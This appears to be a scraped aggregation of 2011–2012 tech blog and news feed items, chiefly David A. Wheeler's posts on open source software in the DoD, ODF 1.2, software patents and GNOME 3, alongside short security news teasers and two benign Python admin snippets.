I did post a rant against SOPA and PIPA the day before, but I’m quite confident that this outage was unrelated.
Anyway, I’m back up.
As some of you may remember, during 2011 we published a malware calendar wallpaper for each month of the year.
We're doing so again this year, with updated information from 2011. However, we've decided to take a slightly different approach this year and publish all 12 wallpapers in one place. You can find them all here.
We hope you like this year's designs and find the data interesting.
Kaspersky Lab malware researcher Tillmann Werner joins Ryan Naraine to talk about the threat from peer-to-peer botnets. The discussions range from botnet-takedown activities and the ongoing cat-and-mouse games to cope with the botnet menace.
Please protest the proposed SOPA (Stop Online Piracy Act) and PIPA (PROTECT IP Act). The English Wikipedia is blacked out today, and many other websites (like Google) are trying to raise awareness of these hideous proposed laws. The EFF has more information about PIPA and SOPA. Yes, the U.S. House has temporarily suspended its work, but that is just temporary; it needs to be clear that such egregious laws must never be accepted.
Wikimedia Foundation board member Kat Walsh puts it very well: “We [the Wikimedia Foundation and its project participants] depend on a legal infrastructure that makes it possible for us to operate. And we depend on a legal infrastructure that also allows other sites to host user-contributed material, both information and expression. For the most part, Wikimedia projects are organizing and summarizing and collecting the world’s knowledge. We’re putting it in context, and showing people how to make sense of it. But that knowledge has to be published somewhere for anyone to find and use it. Where it can be censored without due process, it hurts the speaker, the public, and Wikimedia. Where you can only speak if you have sufficient resources to fight legal challenges, or, if your views are pre-approved by someone who does, the same narrow set of ideas already popular will continue to be all anyone has meaningful access to.”
The U.S. Department of Defense (DoD) has changed one of its key software development documents, making it even clearer that it’s okay to use open source software (OSS) in the DoD. This is good news beyond the DoD; if the US DoD can widely accept OSS, then maybe other organizations (that you deal with) can too.
That key document has the long title “Application Security & Development (AppDev) Security Technical Implementation Guide (STIG),” aka the AppDev STIG. The AppDev STIG includes some guidelines for how to write secure software, and a checklist for use before you can deploy custom software in certain cases. In the past, many people thought that using OSS in the DoD required special permission, because they misunderstood some of DoD’s policies, and this misunderstanding had crept into the AppDev STIG. The good news is that this has been fixed.
Here’s the basic background.
Open source software (OSS) is software where anyone can read, modify, and redistribute the source code (its “blueprints”) in original or modified form. OSS is widely used and developed in industry; some popular OSS includes the Linux kernel (the basis of Google’s Android), the Firefox web browser, and Apache (the world’s most popular web server). You can get quantitative numbers about OSS at http://www.dwheeler.com/oss_fs_why.html. There is a lot of high-quality OSS, and OSS is often very inexpensive even when you include installation, training, and so on.
Unfortunately, previous versions of the AppDev STIG were often interpreted as saying that using OSS required special permission. This document matters; DoD Directive (DoDD) 8500.01E requires that “all IA and IA-enabled IT products incorporated into DoD information systems shall be configured in accordance with DoD-approved security configuration guidelines” and tasks DISA to develop the STIGs. It’s often difficult to get systems fielded unless they meet the STIGs.
AppDev STIG version 3 revision 1 (an older version) said:
(APP2090.1: CAT II) “The Program Manager will obtain DAA acceptance of risk for all open source, public domain, shareware, freeware, and other software products/libraries with no warranty and no source code review capability, but are required for mission accomplishment.”
(APP2090.2: CAT II): “The Designer will document for DAA approval all open source, public domain, shareware, freeware, and other software products/libraries with limited or no warranty, but are required for mission accomplishment.”
Many people interpreted this as saying that any use of OSS required special permission. But where would the Defense Information Systems Agency (DISA), the author of the AppDev STIG, get that idea? Well, it turns out that this is a common misunderstanding of DoD policy. DoD Instruction 8500.2, February 6, 2003 has a control called “DCPD-1 Public Domain Software Controls” (http://www.dtic.mil/whs/directives/corres/pdf/850002p.pdf), which starts with this text:
Binary or machine executable public domain software products and other software products with limited or no warranty such as those commonly known as freeware or shareware are not used in DoD information systems unless they are necessary for mission accomplishment and there are no alternative IT solutions available.
A lot of people stopped reading there; they saw that “freeware” required special permission, and since OSS can often be downloaded for free, they presumed that all OSS was “freeware.” They should have kept reading, because it then goes on to make it clear that OSS is not freeware:
Such products are assessed for information assurance impacts, and approved for use by the DAA. The assessment addresses the fact that such software products are difficult or impossible to review, repair, or extend, given that the Government does not have access to the original source code and there is no owner who could make such repairs on behalf of the Government…
This latter part makes it clear that software only requires special treatment if the government cannot review, repair, or extend the software. If the government can do these things, there’s no problem, and by definition OSS provides these rights. But a lot of people didn’t understand this.
This was such a common misunderstanding that in October 2009, the DoD CIO’s memo “Clarifying Guidance Regarding Open Source Software (OSS)” specifically stated (in Attachment 2, 2c) that this was a misunderstanding (http://dodcio.defense.gov/sites/oss/2009OSS.pdf). The DoD CIO later instructed DISA to update the AppDev STIG so this misunderstanding would be removed.
The latest AppDev STIG (Version 3, Release 4) has just fixed this (http://iase.disa.mil/stigs/app_security/app_sec/app_sec.html). The new STIG:
Two related points:
But the editorial gaffe in the AppDev STIG, and the work on improving the wording of controls long term, shouldn’t detract from the main point.
The main point is:
Open Source Software (OSS) is now much easier to use in the DoD.
I’ve learned that Open Source for America (OSFA) has awarded me a 2011 Open Source Award - Individual Award for my work to advocate consideration of “open source software in the US Department of Defense (DoD)”. They specifically point to my papers Why Open Source Software / Free Software? Look at the Numbers! and Nearly all FLOSS is Commercial.
The winners of all the 2011 awards were:
Thanks so much, OSFA! I’m honored.
Hooray! Open Document Format for Office Applications (ODF or OpenDocument) Version 1.2 has been approved as an OASIS Standard. Finally, the world has a standard vendor-independent format for storing and exchanging ordinary office documents (particularly word processing documents, spreadsheets, and presentations) that you can edit.
Historically, people have only been able to exchange these documents if they use the same program, locking users into specific vendor products. In short, users often don’t really own the documents they create; they are often beholden to the developers of their tools. This is especially nasty for government documents; all governments have to choose some product, and whatever product they use implicitly forces their citizens to use the same product (whether they want to or not). Over time these documents can no longer be read, as products are upgraded or people change products, so this is also a disaster for archiving. We can read the Magna Carta more easily than some documents saved 30 years ago. Heck, we can read Sumerian writings more easily than some documents saved 30 years ago, and that is a scary thing. ODF provides us the possibility of actually exchanging documents, and reading archives, regardless of what program was used to create them. In short, people now have real freedom when they create and exchange normal office documents — they are no longer locked into a particular supplier or version of program.
Rob Weir has some of the highlights of version 1.2, and he has also written an overview of ODF.
For me, the highlight is OpenFormula. Previous versions of the specification could exchange spreadsheets, but did not standardize the format of recalculated formulas. I led the subcommittee in the ODF Technical Committee to nail down exactly how to recalculate formulas. The result: We now have a real spec. My sincere thanks to the many who helped make this possible. Feel free to see my 2011-05-28 post about the success of OpenFormula.
I’m sure that there will continue to be refinements for years to come; that is normal for a standard. In some sense this is after the fact; like many good standards, it was developed through the cooperation of many of the implementors. It is already implemented, at least in part, in many places, and I expect even more completed implementations soon.
The key, though, is that users can finally own the documents they create. That is a major step forward, for all of us.
I encourage all US citizens to sign this petition to the US White House to “direct the patent office to cease issuing software patents”. I believe software patents impede innovation (instead of helping it), and they have become a threat to the US economy. Many organizations involved in software are now spending lots of time fending off patent trolls, fighting patent lawsuits, or cannot safely solve problems due to patent thickets. The recently-passed “America Invents Act” (AIA) completely failed to deal with this fundamental problem.
Signing a petition won’t immediately solve anything. That’s not how it works. But repeatedly making the government aware that there’s a real problem is a good first step to solving a problem. In the US, the right of the people to petition their government is guaranteed by the first amendment of the US Constitution (“Congress shall make no law …. abridging… the right of the people peaceably to assemble, and to petition the Government for a redress of grievances”). Everyone is affected today by software, and so far the government has not effectively dealt with the problem. Please use this opportunity to make the government aware of a real problem.
Off-the-shelf (OTS) software is simply software that is ready-made and available for use. Even when you need a custom system, building it from many OTS components has many advantages, which is why everyone does it. OTS works because you can save money and time, increase quality, and increase innovation through resource pooling.
However, people can get easily confused by the many different ways that off-the-shelf (OTS) software can be maintained. Terminology varies, and there hasn’t been an obvious way to describe how these different approaches are related. In 2010 I chatted with several others about how to make this clearer, and then created a picture that I think clarifies things. My thanks to helpful critiques from Heather Burke and John Scott. So here’s the picture, followed by a discussion on what it means.
If OTS software is commercial, it’s commercial OTS (COTS) software. By U.S. law, any software is commercial if it is (1) sold, licensed, or leased to the public, and (2) has a non-governmental use. There are two kinds of COTS software: Open Source Software (OSS) and proprietary software. OSS, put briefly, is software whose licenses give users the freedom to run the program for any purpose, to study and modify the program, and to redistribute copies of either the original or modified program (without having to pay royalties to previous developers). Yes, practically all OSS is commercial.
OTS can also be retained and maintained internally by an organization. For example, the U.S. government develops and maintains some software internally. In the U.S. government world, such software is often called government OTS (GOTS). This figure shows things from the point of view of the U.S. government, but if you work with some other organization, you can think of this figure with your organization in the place of the U.S. government. (Maybe this should be called “internal off-the-shelf” or “IOTS” instead!) The idea here is that any organization can have software that it controls internally and views as internal OTS software, as well as the COTS software that is available to the public.
There are various reasons why the government should sometimes keep certain software in-house, e.g., because sole possession of the software gives the U.S. a distinct advantage over its adversaries. However, there is also considerable risk to the government if it tries to privately hold GOTS software within the government for too long. Technological advantage is usually fleeting. Often there is a commercially-developed item available to the public that begins to perform similar functions. As it matures, other organizations begin using this non-GOTS solution, potentially rendering the GOTS solution obsolete. Such cases often impose difficult decisions, as the government must determine if it will pay the heavy asymmetrical cost to switch, or if it will continue “as usual” with its now-obsolete GOTS systems (with high annual costs and limitations that may risk lives or missions).
Either COTS or GOTS may be maintained by a single maintainer or by a community. In community maintenance there is often a single organization who determines if proposals should be accepted, but the key here is that the work tends to be distributed among those affected. An Open GOTS (OGOTS) project is a GOTS project which uses multiple-organization collaborative development approaches to develop and maintain software, in a manner similar to OSS. Some people use the term “Government Open Source Software” (GOSS) instead of OGOTS (in particular, GOSS for Govies uses the term GOSS instead).
GOTS (including OGOTS) is basically a special case of “gated software” with development inside a government. However, governments are bigger than most companies, and (in democracies) they are supposed to serve all of their citizenry, and those factors make them rather different than most other gated communities. Community development of proprietary software (“gated software”) outside governments is less common, but it can happen (historically some parts of Unix were developed this way). The term Open Technology Development (OTD) involves community development among government users (in the case of government developers), and thus it includes both OSS and OGOTS (aka GOSS).
I should note that I have a broad view of maintenance. I’ve often said that there is only one program — “Hello, World” — and that the rest is maintenance. That’s overstated for effect, but I believe there is a lot of truth in that statement.
This figure, and some of the text above, is in section 1.3 of the paper Open Technology Development (OTD): Lessons Learned & Best Practices for Military Software (also available via MIL-OSS), which is released under the Creative Commons BY-SA license. If you’re interested in more, please see the paper! The figure and some of the text are also part of “Software is a Renewable Military Resource” by John Scott, Dr. David A. Wheeler, Mark Lucas, and J.C. Herz, Journal of Software Technology, February 2011, Vol. 14, Number 1.
I hope this figure makes it easier to understand the different approaches for maintaining off-the-shelf (OTS) software.
Asking “who has the copyright?” for intellectual works (like software, documents, and data) is almost always the wrong question to ask. Instead, ask “what rights do I have (or can I get)?” and “do those rights let me do what I want to do?”. In a vast number of situations, those are the right questions to ask instead. Even people who should know better can fall into this subtle trap!
This became obvious to me when it was revealed that even the smart people at the Apache Software Foundation fell into this. In the recent Accumulo proposal, there were unnecessary copyright hurdles because Apache was unnecessarily asking for a copyright transfer, instead of the necessary rights (in this case, there was no copyright to transfer!).
So I’ve justed posted Ask Not Who Holds the Copyright, which I hope will clear this up.
I recently went to the MIL-OSS (“military open source software”) 2011 Working Group (WG) / Conference in Atlanta, Georgia. Topics included the open prosthetics project, releasing government-funded software as OSS, replacing MATLAB with Python, the “Open Technology Dossier Protocol” (OTDP), confining users using SELinux, an explanation of DoD policies on OSS, Charlie Schweik’s study on what makes a successful OSS project, and more.
Some people started developing a walkie-talkie Android app at the conference.
Here’s a summary of the conference, if you’re curious.
First, a few general comments. If this conference is any guide, it is slowly getting easier to get OSS into government (including military) systems. OSS is already used in many places, but it’s often “don’t ask, don’t tell”, and there are still lots of silly bureaucratic barriers that prevent the use of OSS where it should be used or at least considered. But there were many success stories, with slide titles like “how we succeeded”.
Although the conference had serious purposes, it was all done in good humor. All participants got the MIL-OSS poster of Uncle Sam (saying “I want YOU to Open Source!”). The theme of the conference was the WarGames movie; the first finder for each of the WarGames Easter eggs would get a silly 80s-style prize (such as an Atari T-shirt).
As the MIL-OSS 2011 presentations list shows, I gave three talks:
The conference was complicated by the recent passing of Hurricane Irene. The area itself was fine, but some people had trouble flying in. The first day’s whole schedule was delayed so speakers could arrive (using rescheduled flights). That was probably the best thing to do in the circumstances (it was basically like a temporary time zone change), but it meant that one of my talks that day (Why the GPL Might not Destroy the Universe) was at 9:10pm. And I wasn’t even the last speaker. Eeeek. Around 15 speakers had still not arrived when the conference started, but all but one managed to get there before they had to speak.
Here are few notes on the talks:
Many discussions revolved around the problems of getting authentication/authorization working without passwords, in particular using the ID cards now widely used by nearly all western governments (such as DoD CAC cards). Although things can work sometimes, it’s incredibly painful to get them to work on any system (OSS or not), and they are fragile. Dmitri Pal (Red Hat)’s talk “CAC and Kerberos From Vision to Reality” discussed some of the problems and ways to possibly make it better. The OpenSSH developers are actively hostile to the X.509 standard that everyone uses for identity certificates; I agree with the OpenSSH folks that X.509 is clunky, but that is what everyone uses, and not supporting X.509 means that openssh is useless for them. Every card reader is incompatible with the others, so every time a new model comes out, drivers have to be written and it often doesn’t work anyway (compare that to USB keyboards, which “just work” every time even through KVM switches). I think some group needs to be formed, maybe a “Simple Authorization without passwords” group, with the goal of setting standards and building OSS components so that systems by default (maybe by installing one package) can trivially use PKI and other systems and have it “just work” every time, no matter what client, server (relying party), or third-party authenticator/authorization server is in use.
If you’re interested in more of my personal thoughts about OSS and the U.S. Department of Defense (DoD), also see FLOSS Weekly #160, the interview of David A. Wheeler by Randal Schwartz and Simon Phipps. Good general sites for more info are the MIL-OSS website and the DoD CIO Free Open Source Software (FOSS) site.
There’s more to be done, but a lot is already happening.
So the biggest PC maker is getting ready to dump its PC business. That's the gist of HP kills tablets, confirms PC spin-off plans, in Computerworld.
Today we're happy to announce the release of the "We're In" app for Windows Phone.
We’re In makes organizing get-togethers, carpooling and trying to find people in a crowd a breeze. Any time you want to see where your friends are, We're In can help you. It's simple: invite your friends, and when they join, they'll see your location and you'll see theirs. When the invite expires, so does the shared location – no complicated process to worry about.
We’re In is a great way to save time and frustration when planning your road trip or meeting your friend at the mall – helping you connect with your friends faster. Let’s take a closer look at the new We’re In product features and how they work.
We’ve made We’re In super simple to use – all you need is your phone number to sign up. Simply invite your friends (via your contacts) to start sharing location info with each other including who, why, and how long:
Pick your friends from the contact list or enter their phone number, tell them what the plan is. At this point you can choose how long you want to share location info.
Your friends receive a text message with these details. They can use the app to join you or, for friends that don't have a Windows Phone, they can join from the mobile website via the invite.
Today we are beginning to re-enable the ability to create new Linked IDs. This change is rolling out in the next couple days and should be complete this week.
Some customers – particularly power users – have told us that it’s essential to be able to juggle multiple accounts. Over the last year we’ve added several powerful new ways to do this, specifically aliases and email aggregation (“POP aggregation”), on top of existing features like “plus addresses”. Each of these is a great solution designed to help with a different scenario:
As we have made these changes, we looked at how most people use Linked IDs and found that, for the most part, they were used to solve exactly these problems – managing multiple email addresses and accounts. In our major update last month, one of the things we did is turn off the ability to create new Linked IDs, instead encouraging use of our new features. However it became clear from listening to your feedback that there were many people who used Linked IDs for other reasons, and so we are making a change today to re-enable the creation of Linked IDs.
Many of you know what a huge Drupal fan I am, and while I am a bit heartbroken that I will not attend the upcoming DrupalCon London, happening August 22-26 in Croydon, I'd like to give the rest of you the skinny on DrupalCon so you can all go have fun without me. To that end, I got a few tidbits from Robert Castelo, one of DrupalCon's organizers.
A centralized syslog server was one of the first true SysAdmin tasks that I was given as a Linux Administrator way back in 1997. My boss at the time wanted to pull in log files from various appliances and have me use regexp to search them for certain key words. At the time Linux was still in its infancy, and I had just been dabbling with it in my free time. more>>
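The keyword-search part of that task is easy to sketch out. Here is a minimal Python example of the idea; the log path and keyword list are made up for illustration, not what that 1997 setup actually used:

```python
import re
from pathlib import Path

# Hypothetical keywords and log location -- adjust for your own appliances.
KEYWORDS = ["fail", "denied", "panic"]
LOGFILE = Path("/var/log/syslog")

# One case-insensitive pattern that matches any of the keywords.
PATTERN = re.compile("|".join(re.escape(word) for word in KEYWORDS), re.IGNORECASE)

def scan(logfile: Path) -> None:
    """Print every line of the log that contains one of the keywords."""
    with logfile.open(errors="replace") as handle:
        for lineno, line in enumerate(handle, start=1):
            if PATTERN.search(line):
                print(f"{logfile}:{lineno}: {line.rstrip()}")

if __name__ == "__main__":
    scan(LOGFILE)
```

Pointed at the directory a central syslog server writes to, a small script like this covers most of a basic "watch the logs for key words" job.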
eBay-style outsourcing site PeoplePerHour says a rival firm faked emails which claimed to be offering the company's customer database for sale.…
The 17th annual Readers' Choice Awards are under way! Voting will close on Sep. 2, 2011.
Please note: you are not required to vote in every category; simply skip over a question if you wish.
Thank you for participating!
Your friends at Linux Journal
more>>
Supporters of the People for the Ethical Treatment of Animals (PETA) organisation may have embraced new measures in the fight for animal rights, allegedly releasing a malware-infected version of a dog-fighting app PETA wants banned.…
Security researchers have unearthed a piece of malware that mints a digital currency known as Bitcoins by harnessing the immense power of an infected machine's graphical processing units.…
Back in March of '09, I posted Get ready for fourth party services here, calling them "a classification for user-driven services" and "a place where a vast new marketplace can open up, serving customers first". more>>
I recently moved my personal website from GoDaddy to my home server. I have a business connection at my house, and my site gets little enough traffic that hosting at home on my static IP makes sense. Moving the files wasn't really difficult, I FTP'd them down from the old server, and SFTP'd them up to the new server. Moving the database was a bit more challenging, however.
more>>
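A minimal sketch of the database step, assuming a typical MySQL-backed site (the hostnames, user, and database name below are placeholders, and the -p flag makes the client tools prompt for passwords):

```python
import subprocess

# Placeholder connection details -- substitute your own hosts, user, and database.
OLD = {"host": "old-host.example.com", "user": "dbuser", "db": "mysite"}
NEW = {"host": "localhost", "user": "dbuser", "db": "mysite"}
DUMPFILE = "mysite.sql"

def dump(cfg: dict, path: str) -> None:
    """Export the old database to a plain-SQL file with mysqldump."""
    with open(path, "w") as out:
        subprocess.run(
            ["mysqldump", "-h", cfg["host"], "-u", cfg["user"], "-p", cfg["db"]],
            stdout=out, check=True)

def load(cfg: dict, path: str) -> None:
    """Import the dump into the new server with the mysql client."""
    with open(path) as dumpfile:
        subprocess.run(
            ["mysql", "-h", cfg["host"], "-u", cfg["user"], "-p", cfg["db"]],
            stdin=dumpfile, check=True)

if __name__ == "__main__":
    dump(OLD, DUMPFILE)
    load(NEW, DUMPFILE)
```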
An attack targeting sites running unpatched versions of the osCommerce web application kept growing virally this week, more than three weeks after a security firm warned it was being used to install malware on the computers of unsuspecting users.…
Please select the color of your car. If you have two different color cars, or a car that is multi-colored -- pick a color you feel speaks to your inner geekness the most. (If your color isn't listed, pick the closest. THERE IS NO "OTHER")
UPDATE: I added an option for those without cars. Because I give and give and give. ;o)
A support blog for alleged Pentagon hacker Gary McKinnon had its domain name hijacked on Friday morning.…
An error message on once dominant but now almost defunct social networking site MySpace early on Friday has been confused with a hack.…
Claims that both CDMA and 4G networks were compromised at the recent Defcon security event in Las Vegas have raised little surprise, but the vulnerability of handsets is hotly debated.…
There were fears of further outbreaks of violence on the streets yesterday when the UK's busiest motoring forum site, PistonHeads.com, disappeared offline.…
Research in Motion has squashed a nasty bug in its BlackBerry server software that allowed it to be commandeered when handset users received messages containing booby-trapped images.…
Package management in Linux is great, but unfortunately, it comes with a few cons. Granted, most distributions keep all your software, not just system software like Apple and Microsoft, updated. The downside is that software packages aren't always the latest versions. Whatever is in the repository is what you get. more>>
Politically motivated hacking crew TeaMp0isoN has teamed up with Anonymous in an attempt to storm the music charts.…
Android Trojan writers are trying more tricks to fool the unwary into downloading rogue applications with a new set of rogue applications.…
The website of Super Glue became bunged up with a malicious script earlier this week as part of a tricky problem that was only resolved on Wednesday.…
Scribus is designed for quality printing. Unlike a word processor, its output is not meant simply to be good enough for practical use, but to be fine-tuned until it is as close as possible to what you want. For this reason, printing is considerably more complicated in Scribus than in the office applications with which you may be familiar. more>>
The Chinese government claims it came under almost 500,000 cyberattacks last year, most of which it said originated outside the country.…
The Information Commissioner's Office is facing criticism today for its failure to punish online retailer Lush for losing 5,000 customer debit and credit card details…
Reported plans by Anonymous to attack Facebook on 5 November appear to be an elaborate hoax by an unknown source.…
A turf war is developing between rootkit-touting cybercrooks over control of infected PCs.…
Microsoft has released 13 updates that patch security holes in a wide range of its software offerings, including vulnerabilities rated critical in its Internet Explorer browser and Windows server operating systems.…
In the first part of this series I introduced SuperCollider3 and its most basic operations. Now let's make things a little more interesting by adding a little randomization, a neat GUI, and some MIDI control.
Creating A GUI more>>
RIM's corporate blog has been defaced with threats as part of a protest against the BlackBerry maker's plans to hand over information on London rioters to the police.…
Scammers are attempting to trick Firefox users into downloading backdoored software via spam emails that supposedly advertise an "update" to the open-source browser.…
Sweary celebrity chef Gordon Ramsay is suing members of his wife's family, alleging they used malware to gain illicit access to his business and personal email accounts.…
Tails is a live media Linux distro designed to boot into a highly secure desktop environment. You may remember that we looked at a US government distro with similar aims a few months ago, but Tails is different because it is aimed at the privacy-conscious “normal user” rather than government workers. more>>
A 10-year-old hacker has won the admiration of her adult peers for finding a previously unknown vulnerability in games on iOS and Android devices.…
Black Hat Apple may have built its most secure Mac operating system yet, but a prominent security consultancy is advising enterprise clients to steer clear of adopting large numbers of the machines.…
Recycling is something we all deal with, or at least should deal with, when it comes to technology. more>>
Networking giant Cisco has warned customers that a CD-ROM it supplied with its kit automatically took users to a site that was a known malware repository.…
Microsoft is fuelling up 13 bulletins for release next week, including an update that guards against critical flaws in Internet Explorer.…
Black Hat Independent security consultant Stefan Esser made waves earlier this year when a technique he developed for hacking iPhones was adopted by JailbreakMe and other mainstream jailbreaking services.…
Malware-slingers are tapping into the buzz around a new Harry Potter site to mount a variety of scams designed to either defraud, infect or otherwise con would-be victims.…
Members of Anonymous are developing a new attack tool as an alternative to the LOIC (Low Orbit Ion Cannon) DDoS utility.…
The number of apps on mobile marketplaces contaminated with malware grew from 80 to 400 during the first half of 2011, according to a study by Lookout Mobile Security.…
A researcher has discovered a flaw in software used to spy on government agencies and contractors that can alert security personnel that their networks have been infiltrated by the otherwise hard-to-detect programs.…
Black Hat Google has billed its Chrome operating system as a security breakthrough that's largely immune to the threats that have plagued traditional computers for decades. With almost nothing stored on its hard drive and no native applications, there's no sensitive data that can be pilfered and it can't be commandeered when attackers exploit common software vulnerabilities.…
I’m a long-time user of Fedora and GNOME. GNOME 2 has served me well over the years, so I was interested in what the GNOME people were cooking for GNOME 3. Fedora 15 comes with the new GNOME 3 shell; since change can sometimes be good, I’ve tried to give the new GNOME 3 shell a fair trial.
But after giving GNOME 3 (especially GNOME shell) some time, I’ve decided that I hate the GNOME 3 shell as it’s currently implemented. It’s not just me; the list of people who have complaints about the GNOME 3 shell includes Linus Torvalds, Dedoimedo (see also here), k3rnel.net (Juan “Nushio” Rodriguez), Martin Sourada, junger95, and others. LWN noted the problems of the GNOME 3 shell way back. So many people are leaving GNOME 3, often moving to XFCE, that one person posted a poem titled “GNOME 3, Unity, and XFCE: The Mass Exodus”.
The GNOME 3 shell is beautiful. No doubt. But as far as I can tell, the developers concentrated on making it beautiful, cool, and different, and as a consequence made it far less useful and efficient for people. Dedoimedo summarizes the GNOME 3.0 shell as, “While it’s a very pretty and comely interface, it struck me as counterproductive, designed with a change for the sake of change.” In a different post Dedoimedo says, “Gnome 3 is a toy. A beautiful, aesthetic toy. But it is not a productivity item… I am not a child. My computer is not a toy. It’s a serious tool… Don’t mistake conservative for inefficient. I just want my efficiency.”.
Some developers have tried to fix the worst problems of the GNOME 3 shell with extensions, and if GNOME developers work at it, I think they could change it into something useful. But most of these problems aren’t just maturity issues; the GNOME 3 shell is broken by design. So I’m going to switch to XFCE so I can get work done, and perhaps try it again later if they’ve started to fix it. Thankfully, Fedora 15 makes it easy to switch to another desktop like XFCE, so I can keep on happily using Fedora.
So what’s wrong?
I’ve been trying to figure out why I hate GNOME 3 so much, and it comes down to two issues: (1) GNOME 3’s shell makes it much harder to do simple, common tasks, and (2) GNOME 3 shell often hides how to do tasks (it’s not “discoverable”). These are not just my opinions, lots of people say these kinds of things. k3rnel.net says, “Gnome’s ‘Simplicity’ is down right insulting to a computer enthusiast. It makes it impossible to do simple tasks that used to flow naturally, and it’s made dozens of bizarre ‘design decisions’, like hiding Power Off behind the ‘Alt’ key.” Let me give you examples of each of these issues.
First of all, GNOME 3 (particularly its default GNOME shell) creates a lot of extra steps and work to do simple tasks that used to be simpler. To run a program whose name you don’t know, you have to go to the far top left to the hot spot (or press “LOGO”), move your mouse to the hideously hard-to-place (and not obvious) “Applications” word slightly down on the right, then mouse to the far right to choose a category, then mouse back to choose it. That’s absurd; the corners of the screen are especially easy to get to, and they fail to use that fact when choosing non-favorite applications. Remarkably, there doesn’t seem to be a quick way to simply show the list of (organized) applications you can start; there’s not even a keyboard shortcut for “LOGO Applications”. Eek. This is a basic item; even Windows 95 was easier. Would it really have killed anyone to make moving to some other area (say, the bottom left corner) show the applications? And why are the categories on the far right, where they are least easy to get to and not where any other system puts them? (Yes, the favorites area lets you start some programs, but you have to find it the first time, and some of us use many programs.) Also, you can’t quickly alt-tab between arbitrary windows (Alt-tab only moves between apps, and the undiscoverable alt-` only moves between windows of the same app). GNOME shell makes it easy to do instant messaging, but it makes it harder to do everything else. Fail.
GNOME 3’s capabilities are not discoverable, either. To log off or change system settings you click on your name — and that’s already non-obvious. But it gets worse. To power off, you click on your name, then press the ALT key to display the power off option, then select it. How the heck would a normal user find out about this? The only obvious way to power down the system is to log out, then power off from the front. If you know an application name, pressing LOGO (aka WINDOWS) and typing its name is actually a nice feature, but that is not discoverable either. If you want a new process or window (like a new terminal window or file manager window), you have to know to press control when you select its icon to start a new process (for Terminal, you can also start it and press shift+control+N, but that is not true for all programs). The need to press control isn’t discoverable (it’s also a terrible default; if I press a program icon, I want a new one; if I wanted an existing one I’d select its window instead). Fail.
There are some nice things about the GNOME 3 shell. As I mentioned earlier, I like the ability to press LOGO and start typing a program name (which you can then select) - that is nice. But even then, this is not discoverable; how would a user new to the interface know that they should press the LOGO button? This functionality is trivial to get in other desktop environments; I configured XFCE to provide the same functionality in less than a minute (in a way that is less pretty, but much easier for a human to use).
The implementors seem to think that new is automatically better. Ridiculous. I don’t use computers to have the newest fad interface, I use them to get things done (and for the pleasure of using them). I will accept changes, but they should be obvious improvements. Every change made just for its own sake imposes relearning costs, especially for people like me who use many different computers and interfaces, and especially if it makes common operations harder. Non-discoverability is especially nasty; people don’t want to read manuals for basic GUI interfaces, they want to get things done.
I don’t think GNOME 3 is mature, either. For example, as of 2011-07-28, GNOME 3 does not support screensavers — it just shows a blank screen after a timeout. But the previous GNOME 2 had screensavers. Heck, Windows 3.0 (of 1990) did better than that; it had screensavers, and I’m sure there were screensavers before then.
I’ve tried to get used to it, because I wanted to give new ideas a chance. Different can be better! But so far, I’m not impressed. The code may be cleaner, and it may be pretty, but the user experience is currently lousy.
If you’re stuck using the GNOME 3 Shell, you basically must read the GNOME shell cheat sheet, because so much of what it does is un-intuitive, incompatible with everything else, and non-discoverable. Needing to read a manual to use a modern user interface is not a good sign.
You could try switching to the GNOME 3 fallback mode, as discussed by Dedoimedo and others. This turns on a more traditional interface. Several people have declared that GNOME 3 fallback is better than GNOME shell itself. But I was not pleased; it’s not really well-supported, and it’s really not clear that it will be supported long term.
You can also try various tweaks, configurations, and additional packages to make GNOME 3 shell more tolerable. If you’re stuck with GNOME 3 shell, install and use gnome-tweak-tool; that helps. You should also install the Fedora gnome-shell-extensions-alternative-status-menu package, which lets you see “Power off” as an option.
But after trying all that, I decided that it’d be better to switch to another more productive and mature desktop environment. Obvious options are XFCE and KDE.
XFCE is a lightweight desktop environment, and it is what I’ve chosen to use instead of the default GNOME 3 shell. I found out later that other people have switched to XFCE after trying and hating GNOME 3’s shell. XFCE doesn’t look as nice as GNOME 3; indeed, the GNOME 3 shell is really quite flashy by comparison. But the GNOME shell makes it hard for me to get anything done, and that’s more important.
I expect that it wouldn’t be hard for the developers to make it better; hopefully the GNOME folks will work to improve it. If many of GNOME 3’s problems are fixed, then I’ll be happy to try it again. But I’m in no hurry; XFCE works just fine.
I’m creating a new page on my website called Notes on Fedora so that I can record “how to” stuff, in case that others find it useful. For example, I’ve recorded how to turn on some stuff in XFCE to make it prettier. Enjoy!
If you’re interested in free/libre/open source software in government (particularly the U.S. federal government), there are two upcoming conferences you should consider.
One is Government Open Source Conference (GOSCON) 2011 on August 23, 2011. It will be held at the Washington Convention Center, Washington, DC.
The other is the Military Open Source Software (MIL-OSS) WG3 conference on August 30 - September 1, 2011. It will be held in Atlanta, Georgia.
I’ll be speaking at both. But don’t let that dissuade you :-).
Cybercrooks have begun using botnets of compromised machines to mine units of the Bitcoin virtual currency.…
A five-year operation targeting more than 70 global companies, governments and non-profit organisations was probably the work of an intelligence agency, according to McAfee.…
An attack that targets a popular online commerce application has infected almost 5 million webpages with scripts that attempt to install malware on their visitors' computers.…
Criminals have increased the functionality of Android Trojans with a new strain that is capable of recording, and not just logging, conversations on compromised smartphones.…
Scareware scammers are targeting credit card users with a new run of spam emails falsely warning recipients that their plastic has been blocked.…
More details have emerged of an e-commerce software flaw linked to the theft of credit card information from numerous websites.…
A bug involving the method Skype uses to integrate with Facebook creates a possible account-hijack risk, security watchers warn.…
F1 Driver Jenson Button brushed off an attack on his website late on Saturday night that falsely claimed he had been seriously injured in a car crash, and went on to win the Hungarian Grand Prix on Sunday.…
Hard on the heels of warnings that critical systems in America are vulnerable to Stuxnet-style attacks, a group of security researchers says SCADA systems and PLCs make prisons vulnerable to computer-based attacks.…
Members of the Anonymous hacking collective said they broke into the networks of Mantech International and stole internal documents belonging to the US government contractor.…
Facebook has joined Google and Mozilla in paying cash rewards to researchers who privately report vulnerabilities that could jeopardize the privacy or security of their users.…
Malware-peddling scumbags have developed a particularly sneaky banking Trojan that attempts to trick victims into transferring funds into bank accounts controlled by cybercrooks or their partners.…
The Australian branch of supermarket chain ALDI has withdrawn a range of hard drives from its stores following the discovery that the hardware was infected with malware.…
Personal information on as many as 35 million users of a South Korean social network site may have been exposed as the result of what has been described as the country's biggest ever hack attack.…
Security shortcomings in both ICQ instant messenger for Windows and the ICQ website create a possible mechanism for account hijacking, a security researcher warns.…
LiveJournal is weathering a massive web attack that has meant service disruptions for people who read and write the more than 16 million journals hosted on the community and blogging service.…
